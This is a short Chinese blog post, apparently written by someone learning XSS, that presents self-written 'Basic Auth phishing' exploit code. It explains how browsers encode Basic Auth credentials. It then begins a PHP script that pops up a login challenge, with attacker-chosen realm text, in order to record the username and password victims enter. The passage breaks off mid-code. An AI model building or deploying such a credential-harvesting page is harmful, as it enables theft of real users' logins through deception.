最近在学XSS,想写一个基础认证钓鱼的利用代码,同样是在网上找了半天没发现任何能用的,只好自己改写了
首先了解一下基础认证钓鱼的原理
Basic Auth: 客户端在输入用户名密码后发送请求,浏览器会用一个冒号“:”将用户名和密码连接起来,然后做一下Base64编码,就直接把这个编码后的字符串放到Authorization头部里发给服务器了。
基础认证登陆模拟(当然else if 后面的条件要自己写,具体钓鱼思路就是储存用户输入的 $_SERVER['PHP_AUTH_USER'] $_SERVER['PHP_AUTH_PW']:
error_reporting(0); if ((!isset($_SERVER['PHP_AUTH_USER']))||(!isset($_SERVER['PHP_AUTH_PW']))){ header('WWW-Authenticate:Basic realm="'.addslashes(trim($_GET['info'])).""); header('HTTP/1